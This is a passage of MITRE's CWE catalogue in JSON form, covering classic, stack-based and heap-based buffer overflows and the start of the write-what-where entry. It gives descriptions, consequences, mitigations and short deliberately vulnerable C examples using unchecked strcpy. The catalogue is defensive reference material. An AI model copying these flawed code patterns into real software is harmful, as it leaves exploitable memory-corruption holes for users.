ASCRM"},"Entry_ID":"ASCRM-CWE-120"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}},{"attr":{"@_CAPEC_ID":"92"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Public Enemy #1: The Buffer Overrun&#34; Page 127"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-74"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;C String Handling&#34;, Page 388"}},{"attr":{"@_External_Reference_ID":"REF-64"}},{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-CWE-120"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-120"}}]},"Notes":{"Note":[{"#text":"At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.","attr":{"@_Type":"Relationship"}},{"#text":"Many issues that are now called \\"buffer overflows\\" are substantively different than the \\"classic\\" overflow, including entirely different bug types that rely on overflow exploit techniques, such as integer signedness errors, integer overflows, and format string bugs. This imprecise terminology can make it difficult to determine which variant is being reported.","attr":{"@_Type":"Terminology"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"Changed name and description to more clearly emphasize the \\"classic\\" nature of the overflow."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Other_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Unbounded Transfer (\'Classic Buffer Overflow\')","attr":{"@_Date":"2008-10-14"}}}},"121":{"attr":{"@_ID":"121","@_Name":"Stack-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A stack-based buffer overflow condition is a condition where the buffer being overwritten is allocated on the stack (i.e., is a local variable or, rarely, a parameter to a function).","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"There are generally several security-critical data on an execution stack that can lead to arbitrary code execution. The most prominent is the stored return address, the memory address at which execution should continue once the current function is finished executing. The attacker can overwrite this value with some memory address to which the attacker also has write access, into which they place arbitrary code to be run with the full privileges of the vulnerable program. Alternately, the attacker can supply the address of an important call, for instance the POSIX system() call, leaving arguments to the call on the stack. This is often called a return into libc exploit, since the attacker generally forces the program to jump at return time into an interesting routine in the C standard library (libc). Other important data commonly on the stack include the stack pointer and frame pointer, two values that indicate offsets for computing memory addresses. Modifying those values can often be leveraged into a \\"write-what-where\\" condition."},"Alternate_Terms":{"Alternate_Term":{"Term":"Stack Overflow","Description":"\\"Stack Overflow\\" is often used to mean the same thing as stack-based buffer overflow, however it is also used on occasion to mean stack exhaustion, usually a result from an excessively recursive function call. Due to the ambiguity of the term, use of stack overflow to describe either circumstance is discouraged."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Description":"Do not use dangerous functions such as gets. Use safer, equivalent functions which check for boundary errors."},{"Phase":"Operation","Description":"Use OS-level preventative functionality, such as ASLR. This is not a complete solution."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, stack-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char buf[BUFSIZE];strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"The buffer size is fixed, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker.","Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476)."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Stack overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Stack Overruns&#34; Page 129"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Stack-based buffer overflows can instantiate in return address overwrites, stack pointer overwrites or frame pointer overwrites. They can also be considered function pointer overwrites, array indexer overwrites or write-what-where condition, etc.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Background_Details, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}]}},"122":{"attr":{"@_ID":"122","@_Name":"Heap-based Buffer Overflow","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc().","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Modify Memory"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. Besides important user data, heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker\'s code. Even in applications that do not explicitly use function pointers, the run-time will usually leave many in memory. For example, object methods in C++ are generally implemented using function pointers. Even in C programs, there is often a global offset table used by the underlying runtime."},{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Pre-design: Use a language or compiler that performs automatic bounds checking."},{"Phase":"Architecture and Design","Description":"Use an abstraction library to abstract away risky APIs. Not a complete solution."},{"Phase":"Build and Compilation","Description":"Pre-design through Build: Canary style bounds checking, library changes which ensure the validity of chunk data, and other such fixes are possible, but should not be relied upon."},{"Phase":"Implementation","Description":"Implement and perform bounds checking on input."},{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Do not use dangerous functions such as gets. Look for their safe equivalent, which checks for the boundary."},{"Phase":"Operation","Description":"Use OS-level preventative functionality. This is not a complete solution, but it provides some defense in depth."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While buffer overflow examples can be rather complex, it is possible to have very simple, yet still exploitable, heap-based buffer overflows:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define BUFSIZE 256int main(int argc, char **argv) {}","xhtml:br":"","xhtml:div":{"#text":"char *buf;buf = (char *)malloc(sizeof(char)*BUFSIZE);strcpy(buf, argv[1]);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The buffer is allocated heap memory with a fixed size, but there is no guarantee the string in argv[1] will not exceed this size and cause an overflow."},{"attr":{"@_Demonstrative_Example_ID":"DX-19"},"Intro_Text":"This example applies an encoding procedure to an input string and stores it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char * copy_input(char *user_supplied_string){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE &lt;= strlen(user_supplied_string) ){}dst_index = 0;for ( i = 0; i &lt; strlen(user_supplied_string); i++ ){}return dst_buf;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"die(\\"user string too long, die evil hacker!\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if( \'&amp;\' == user_supplied_string[i] ){}else if (\'&lt;\' == user_supplied_string[i] ){}else dst_buf[dst_index++] = user_supplied_string[i];","xhtml:div":[{"#text":"dst_buf[dst_index++] = \'&amp;\';dst_buf[dst_index++] = \'a\';dst_buf[dst_index++] = \'m\';dst_buf[dst_index++] = \'p\';dst_buf[dst_index++] = \';\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"/* encode to &amp;lt; */"}}],"xhtml:br":["",""]}}]}}}},"Body_Text":"The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4268","Description":"Chain: integer signedness error (CWE-195) passes signed comparison, leading to heap overflow (CWE-122)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4268"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2021-29529","Description":"Chain: machine-learning product can have a heap-based\\n\\t      buffer overflow (CWE-122) when some integer-oriented bounds are\\n\\t      calculated by using ceiling() and floor() on floating point values\\n\\t      (CWE-1339)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29529"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Heap overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Heap Overruns&#34; Page 138"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 5: Buffer Overruns.&#34; Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;Nonexecutable Stack&#34;, Page 76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Protection Mechanisms&#34;, Page 189"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Heap-based buffer overflows are usually just as dangerous as stack-based buffer overflows.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Likelihood_of_Exploit, Observed_Examples, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"123":{"attr":{"@_ID":"123","@_Name":"Write-what-where Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"787","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","DoS: Crash, Exit, or Restart","Bypass Protection Mechanism"],"Note":"Clearly, write-what-where conditions can be used to write data to areas of memory outside the scope of a policy. Also, they almost invariably can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. If the attacker can overwrite a pointer\'s worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator."},{"Scope":["Integrity","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Modify Memory"],"Note":"Many memory accesses can lead to program termination, such as when writing to addresses that are invalid for the current process."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"When the consequence is arbitrary code execution, this can often be used to subvert any other security service."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and 